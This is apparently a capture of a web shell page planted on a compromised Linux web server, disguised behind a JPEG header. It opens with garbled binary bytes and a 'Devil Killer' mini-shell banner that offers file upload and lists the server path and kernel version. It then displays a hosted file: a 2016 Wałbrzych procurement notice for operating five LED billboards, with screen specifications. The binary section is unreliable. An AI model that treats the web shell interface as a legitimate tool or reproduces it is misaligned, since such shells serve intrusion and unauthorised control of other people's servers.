JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161201/356718-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.um.walbrzych.pl/zzp/telebimy2016.zip' target='_blank'>http://www.um.walbrzych.pl/zzp/telebimy2016.zip</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 356718 - 2016
              z dnia 2016-12-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wałbrzych: Współpraca Stron mająca na celu zapewnienie sprawnego 
i efektywnego funkcjonowania zintegrowanego systemu 5 sztuk telebimów zakupionych w ramach projektu TELEBIMY  nowoczesne e-usługi w dziedzinie turystyki i kultury w dolnośląskich gminach, w ramach której Operator odpowiedzialny będzie za zarządzanie techniczne siecią ekranów LED, w tym również za nadzór nad prawidłową emisją wskazanego do publikacji materiału informacyjno  promocyjnego, a Lider Projektu za przekazywanie odpowiednich informacji  niezbędnych do przygotowania materiałów i ich emisji<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Wałbrzych, krajowy numer identyfikacyjny
              57959500000, ul.
              Pl. Magistracki 
              1,
              58300  
              Wałbrzych, woj.
              dolnośląskie, państwo
              Polska, tel.
              074 6655153, 6655154, e-mail
              wizp@um.walbrzych.pl, faks
              746 655 155.
              <br />
              Adres strony internetowej (URL): www.um.walbrzych.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.um.walbrzych.pl/zzp/telebimy2016.zip</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.um.walbrzych.pl/zzp/telebimy2016.zip</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej za pośrednictwem operatora pocztowego, osobiście lub za pośrednictwem posłańca<br />
                Adres:
                <br />Urząd Miejski w Wałbrzychu, Pl. Magistracki 1, 58-300 Wałbrzych, pok. Nr 13</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Współpraca Stron mająca na celu zapewnienie sprawnego 
i efektywnego funkcjonowania zintegrowanego systemu 5 sztuk telebimów zakupionych w ramach projektu TELEBIMY  nowoczesne e-usługi w dziedzinie turystyki i kultury w dolnośląskich gminach, w ramach której Operator odpowiedzialny będzie za zarządzanie techniczne siecią ekranów LED, w tym również za nadzór nad prawidłową emisją wskazanego do publikacji materiału informacyjno  promocyjnego, a Lider Projektu za przekazywanie odpowiednich informacji  niezbędnych do przygotowania materiałów i ich emisji<br /><b>Numer referencyjny: </b>BO.271-143/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest współpraca Stron mająca na celu zapewnienie sprawnego i efektywnego funkcjonowania zintegrowanego systemu 5 sztuk telebimów zakupionych w ramach projektu TELEBIMY  nowoczesne e-usługi w dziedzinie turystyki i kultury w dolnośląskich gminach, w ramach której Operator odpowiedzialny będzie za zarządzanie techniczne siecią ekranów LED, w tym również za nadzór nad prawidłową emisją wskazanego do publikacji materiału informacyjno  promocyjnego, a Lider Projektu za przekazywanie odpowiednich informacji  niezbędnych do przygotowania materiałów i ich emisji.

Zamawiający jest Liderem Projektu TELEBIMY  nowoczesne e-usługi w dziedzinie turystyki i kultury w dolnośląskich gminach finansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Dolnośląskiego 2007-2013, Priorytetu 6, Działania 6.5. Koszt usług Operatora nie stanowi wydatków kwalifikowanych w ramach projektu i będzie finansowany przez Lidera i Partnerów projektu ze środków własnych.
Do obowiązków Operatora należy: 
1. Zarządzanie systemem ekranów LED przez Operatora obejmuje następujący zakres czynności:
1.1 Emisja na 5 Telebimach spotów informacyjno-promocyjnych przygotowanych przez Lidera Projektu:
-  24  spoty o długości 30 sekund  po 2 spoty informacyjno-promocyjne dla każdego partnera projektu, 
-  1 spot o długości 2 minut prezentujący walory turystyczne i kulturalne 12 partnerów projektu,
-  1 spot o długości 10 sekund informujący o przyznaniu dofinansowania ze środków RPO WD,
-  inne spoty i materiały filmowe  opracowane we własnym zakresie przez Lidera lub Partnerów projektu.
1.2 Tworzenie kontentu emisyjnego (nowych spotów informacyjno  promocyjnych) na podstawie materiałów, informacji i wytycznych przekazanych przez Lidera Projektu dla 
5 telebimów, uwzględnianie zgłoszonych uwag przez Lidera Projektu, przedstawianie opracowanych materiałów do akceptacji Liderowi Projektu.
1.3 Budowa harmonogramu kampanii i dobór najkorzystniejszych zestawień prezentowanego materiału.
1.4 Wprowadzanie i aktualizacja tzw. playlisty (planu emisyjnego) dla każdego telebimu indywidualnie lub/i dla określonych grup ekranów.
1.5 Grupowanie telebimów w sposób umożliwiający najlepsze wykorzystanie kampanii informacyjno  promocyjnych.
1.6 Raportowanie wyników wyświetlanych kampanii oraz generowanie statystyk okresowych (kwartalnych).
1.7 Analiza wyników kampanii oraz wprowadzanie stosownych zmian do harmonogramu emisji.
1.8 Nadzorowanie i regulacja parametrów pracy ekranów LED (czas pracy, jasność świecenia, korekcja kolorów).
1.9 Przekazywanie informacji o występujących usterkach i awariach do wskazanych podmiotów, w tym do podmiotu odpowiedzialnego za serwis gwarancyjny. 
1.10 Nadzór nad terminowością wykonania czynności serwisowych.
2. Dysponowanie przez Operatora sprzętem i oprogramowaniem komputerowym umożliwiającym wykonanie czynności wymienionych w punkcie 1.

Do obowiązków Zamawiającego należy:
1. Przekazywanie Operatorowi materiałów, informacji oraz wytycznych, na podstawie których wykonane będą spoty informacyjno  promocyjne. 
2. Akceptacja stworzonych materiałów lub przekazanie ewentualnych uwag i sugestii dotyczących przedstawionych do akceptacji przez Operatora spotów w terminie do 10 dni od przekazania materiałów.
3. Przekazywanie wytycznych dotyczących oczekiwanego harmonogramu kampanii informacyjno  promocyjnej zawierających informacje o godzinach codziennej pracy ekranów, zakładanej długości trwania każdej poszczególnej kampanii, minimalnej ilości dziennych wyświetleń oraz ewentualnych priorytetów ważności prowadzonych kampanii.
4. Informowanie Operatora o każdym otrzymanym zgłoszeniu nieprawidłowości funkcjonowania określonego telebimu lub o nieprawidłowości emisji materiału.

Minimalne parametry techniczne spotów realizowanych w ramach tworzenia kontentu emisyjnego:
Spoty (aplikacje multimedialne) z uwagi na uwarunkowania systemu e-usług muszą zostać zaprojektowane z uwzględnieniem parametrów technicznych ekranów LED i funkcjonalności systemu prezentacji informacji posiadanego przez Zamawiającego.
Poniżej znajdują się podstawowe parametry techniczne ekranów LED, na których wyświetlane będą opracowane w ramach niniejszego zamówienia spoty: 
1. Format ekranu (format) 16:9 (1.78)
2. Tolerancja formatu [%] (+,-) 1
3. Rozmiar piksela (fizyczny / wirtualny) [mm] 16.00 / -
4. Gęstość pikseli (fizyczna / wirtualna) [mm] 3906 / -
5. Konfiguracja piksela (R, G, B) 1R, 1G, 1B
6. Jasność (wartość skalibrowana) [nit] 8 000
7. Kąt widzenia przy 50% jasności [°] H: 120° (+60°/-60°), V: 60 (+30°/-30°)
8. Regulacja jasności (skala) 1-8 poz. (ręczna), 1-100 (automat.)
9. Skala szarości (na kolor) 8192
10. Ilość kolorów 549 mld.
11. Częstotliwość odświeżania (PAL/NTSC) [Hz] &gt; 3000.

Lokalizacja telebimów i dane techniczne:
1. Ekran LED o powierzchni minimalnej 29,36 m2  - 3 sztuki (wraz z jednostkami sterującymi pracą ekranu (3 szt.), 
Parametry techniczne:
Wielkość ekranu (szer. x wys. x dł.) [mm] 7168 x 4096 x 180
Format ekranu (format) 16:9 (1.78)
Tolerancja formatu [%] (+,-) 1
Rozmiar piksela (fizyczny / wirtualny) [mm] 16.00 / -
Gęstość pikseli (fizyczna / wirtualna) [mm] 3906 / -
Konfiguracja piksela (R, G, B) 1R, 1G, 1B
Jasność (wartość skalibrowana) [nit] 8 000
Kąt widzenia przy 50% jasności [°] H: 120° (+60°/-60°), V: 60 (+30°/-30°)
Waga panelu (stal / aluminium) [kg/m2] 57 / -
Pobór mocy (średni / maks.) [W/m2] 420 / 1250
Regulacja jasności (skala) 1-8 poz. (ręczna), 1-100 (automat.)
Skala szarości (na kolor) 8192
Ilość kolorów 549 mld.
Częstotliwość odświeżania (PAL/NTSC) [Hz] &gt; 3000
Zasilanie (V, f) 230V, 50Hz
Poziom wadliwości sprzętu 0,00001
Czas pracy (50% jasności) [godz.] 100 000
Szczelność (przód / tył) IP65 / IP54
Temperatura pracy (min. / maks.) [°C] -20 / +50
Wilgotność pracy (min. - maks.) [% RH] 10 / 90
Pobór mocy (średni / maks.) [W/m2] 420 / 1250
Pobór mocy dla ekranu (średni / maks.) [kW] 12,33 / 36,7
Transmisja danych UTP CAT5 (do 100m)

Miejsce lokalizacji telebimów:
Kobierzyce - Bielany Wrocławskie - ul. Tyniecka/ul Wrocławska, nr działki 99/3 - 2 szt  telebimy ustawione na jednej stopie betonowej
Długołęka - ul. Wrocławska, nr działki 120/17 i 120/30 - 1 szt. - telebim ustawiony na stopie betonowej

2. Ekran LED o powierzchni minimalnej 16,51 m2  - 2 szt. (wraz z jednostkami sterującymi pracą ekranu (2 szt.), 
Parametry techniczne:
Wielkość ekranu (szer. x wys. x dł.) [mm] 5376 x 3072 x 180
Format ekranu (format) 16:9 (1.78)
Tolerancja formatu [%] (+,-) 1
Rozmiar piksela (fizyczny / wirtualny) [mm] 16.00 / -
Gęstość pikseli (fizyczna / wirtualna) [mm] 3906 / -
Konfiguracja piksela (R, G, B) 1R, 1G, 1B
Jasność (wartość skalibrowana) [nit] 8 000
Kąt widzenia przy 50% jasności [°] H: 120° (+60°/-60°), V: 60 (+30°/-30°)
Waga panelu (stal / aluminium) [kg/m2] 57 / -
Pobór mocy (średni / maks.) [W/m2] 420 / 1250
Regulacja jasności (skala) 1-8 poz. (ręczna), 1-100 (automat.)
Skala szarości (na kolor) 8192
Ilość kolorów 549 mld.
Częstotliwość odświeżania (PAL/NTSC) [Hz] &gt; 3000
Zasilanie (V, f) 230V, 50Hz
Poziom wadliwości sprzętu 0,00001
Czas pracy (50% jasności) [godz.] 100 000
Szczelność (przód / tył) IP65 / IP54
Temperatura pracy (min. / maks.) [°C] -20 / +50
Wilgotność pracy (min. - maks.) [% RH] 10 / 90
Pobór mocy (średni / maks.) [W/m2] 420 / 1250
Pobór mocy dla ekranu (średni / maks.) [kW] 6,93/ 20,6
Transmisja danych UTP CAT5 (do 100m)

Miejsce lokalizacji telebimów:
Wałbrzych - ul. Uczniowska/ul. Wrocławska, nr działki 161/3 i 161/5  - 1 szt. - telebim ustawiony na stopie betonowej
Wrocław - budynek przy ul. Dobrzyńskiej 21/23, nr działki 13 - 1 szt.  montaż konstrukcji mocującej do elewacji budynku.

3. Wymagania w zakresie dysponowania niezbędnym sprzętem IT oraz oprogramowaniem.

Opis sprzętu komputerowego i oprogramowania
System pracować będzie w architekturze Klient  Serwer i składać się będzie:
z ekranów LED wraz z oprogramowaniem zarządzająco-sterującym i kamerami IP (zakupione przez Zamawiającego)
serwera - dostęp do serwera zapewnia wyłoniony po zakończeniu realizacji projektu operator, 
komputera sterującego - dostęp do komputera zapewnia wyłoniony po zakończeniu realizacji projektu operator, 
oprogramowania pozwalającego na przygotowanie do emisji materiałów graficznych tj. tekstów, animacji, filmów, grafik - dostęp do oprogramowania zapewnia wyłoniony po zakończeniu realizacji projektu operator. 

Zarządzanie systemem odbywać się będzie na serwerze centralnym, na którym umieszczone będzie oprogramowanie zarządzająco-sterujące umożliwiające dokonywanie konfiguracji i sprawdzania stanu pracy ekranów LED, z poziomu przeglądarki internetowej.
Minimalne wymogi systemu (aplikacji) zostały określone poniżej. 

Architektura systemu - Content i funkcje wyświetlania treści

Lp.
Funkcjonalność
1
Wyświetlanie contentu (treści) w formie listy dynamicznej. Lista emisyjna jest stale synchronizowana automatycznie dając możliwość programowania przyszłych kampanii w dowolnym okresie czasowym i o dowolnej porze. Lista sama dopasowuje dodany do niej materiał, tak aby zapełniać emisją cały dostępny czas wedle zadanych parametrów.
2
W przypadku przepełnienia czasu emisji możliwość priorytetowania ważności spotów. Automatyczna weryfikacja przepełnienia czasu,  alarmowe oznaczenie poziomu wypełnienia czasu. 
3
Możliwość podziału contentu na kategorie np.:
- komercyjnego: materiały, które mają najwyższy priorytet wyświetlania.
- neutralnego: wypełniacz I-go stopnia, ma niższy priorytet wyświetlania niż komercyjny jednak wyższy od domyślnego, np: wizytówka, pogoda, kursy walut, zegarki, informacje i inne elementy zaciekawiające widza.
- domyślnego: wypełniacz II stopnia, najniższy priorytet wyświetlania, np. spoty własne, znajomych, akcje charytatywne i inne.
4
Dodatkowy czas stanowiący różnicę między materiałem komercyjnym a neutralnym może być zapełniony przez materiał domyślny.
5
Możliwość grupowania wielu materiałów w jeden obiekt biblioteki - kontener. Każdy kontener po dodaniu do listy dynamicznej daje możliwość decydowania jak mają być wyświetlane zawarte w nim materiały. Dostępne są 3 tryby emisji:
- klasyczny  możliwość wyświetlania kolejnych elementów z kontenera,
- losowy  możliwość wyświetlania losowych elementów z kontenera,
- sekwencyjny  możliwość wyświetlania elementów w kolejności sekwencji.
6
Możliwość prognozowania poprzez podgląd na program emisji wybranego nośnika w wybranym czasie oraz możliwość sprawdzenia zaplanowanej kampanii poprzez symulację z uwzględnieniem innych zaplanowanych wcześniej emisji i wolnego czasu.
7
Możliwość stworzenia kampanii w taki sposób, że po stworzeniu koszyka spotów dołączamy do niego wybrane ekrany LED. System automatycznie dopasuje odpowiednie proporcje spotów do odpowiednich ekranów.
8
  Możliwość ustawienia jasności dla poszczególnych kabinetów z osobna.
9
Możliwość wprowadzenia jako jednego obiektu biblioteki kilku spotów w różnych proporcjach. Podczas dodawania do kampanii system sprawdzi czy dla danego nośnika dostępna jest odpowiednia proporcja lub automatycznie dopasuje najbliższą dostępną proporcję.
10
Możliwość ustawienia poziomu dopasowania contenetu do formatu ekranu.
11
Możliwość emisji spotów w mało atrakcyjnym czasie emisji (np. wczesnym rankiem, późnym wieczorem) w taki sposób, że między spotami wyświetlana będzie czarna tafla. Możliwość emisji spotów poza zdefiniowanymi godzinami pracy nośnika.
12
Możliwość definiowania szablonów jasności w ciągu roku z możliwością wyboru konkretnych dni tygodnia.
13
Możliwość płynnej i automatycznej regulacji jasności każdego ekranu między poszczególnymi poziomami wyznaczonej jasności (min. 4 poziomy na dobę).
14
Możliwość rozciągania obrazu w celu dopasowania do nośnika w skali 0 do 50%.
15
Możliwość wyświetlania stron www, rss, - możliwość ustawienia pozycji paska rss, jego wysokości i szerokości, koloru tła pod napisem.
16
Możliwość ustawienia rozdzielczości ekranu.
17
Możliwość zdalnego resetu nośnika.
18
W razie awarii serwera podstawowego system przełącza się na serwer zapasowy.
19
W razie problemu z internetem możliwe jest wgranie materiału i ustawień offline - za pomocą np. pendrive.
20
Funkcja symulacji zajętego czasu ekranu na podstawie wyznaczonego harmonogramu.
21
Ustawienie parametrów korekty wyświetlanego obrazu takich jak: gamma, kontrast, 
jasność.
22
Definiowanie domyślnego czasu pracy ekranu oraz definiowanie dodatkowych szablonów czasu pracy z możliwością podziału na poszczególne dni tygodnia.
23
Dostęp do panelu zarządzającego chroniony hasłem wraz z możliwością jego zmiany.
24
Separacja spotów poprzez dodanie ich do tej samej grupy - spoty z grupy o tym samym ID nigdy nie będą wyświetlane obok siebie.
25
Automatyczna aktualizacja nośników z możliwością wymuszenia natychmiastowej aktualizacji.
26
Awaryjna aktualizacja nośnika poprzez np. pendrive (w przypadku zaniku dostępu do sieci Internet).
27
Definiowanie zakresu czasu pracy emisji spotu - wybór dni tygodnia oraz godzin w jakich ma odbywać się emisja (możliwość zdefiniowania więcej niż jednego zakresu).

Architektura systemu - Monitoring i raporty 

Lp.
Funkcjonalność
1
Monitoring dostępności nośnika sprawdzany na bieżąco poprzez sieć Internetową. W razie dłuższego niezgłaszania się nośnika system wyśle powiadomienie email. 
2
Możliwość generowania statystyk w formie raportów pdf - uproszczonych oraz csv - szczegółowych.

Architektura systemu - Obsługiwane formaty 

Lp.
Format
1
Możliwość wyświetlania zawartości stron internetowych w czasie rzeczywistym wraz z animacjami FLASH, funkcja pozwala np. na wyświetlanie informacji pobieranych bezpośrednio z baz danych. Notowania giełdowe, wykresy, rankingi.
2
Odtwarzanie pokazu slajdów Microsoft Power Point  przy zainstalowanym programie MS Power Point.
3
MPEG 1/2/4, AVI, WMV, Divx, Xvid, Mov.
4
JPEG, BMP, PNG.
5
Pliki flash SWF.
6
Kanały RSS np. udostępniane w serwisach internetowych.

Komunikacja bezpośrednia między jednostką posiadającą dostęp do sieci (operatorem) i ekranem LED odbywać się będzie przy wykorzystaniu oprogramowania, dzięki któremu możliwe będzie zdalne sterowanie z dowolnego miejsca posiadającego dostęp do Internetu.

Wszystkie obowiązki Wykonawcy zawarte są w załączonym projekcie umowy. <br /><br /><b>II.5) Główny kod CPV: </b>72315000-6<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              40000<br />
              Waluta:
              <br /><div style="padding-left: 20px">PLN<br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
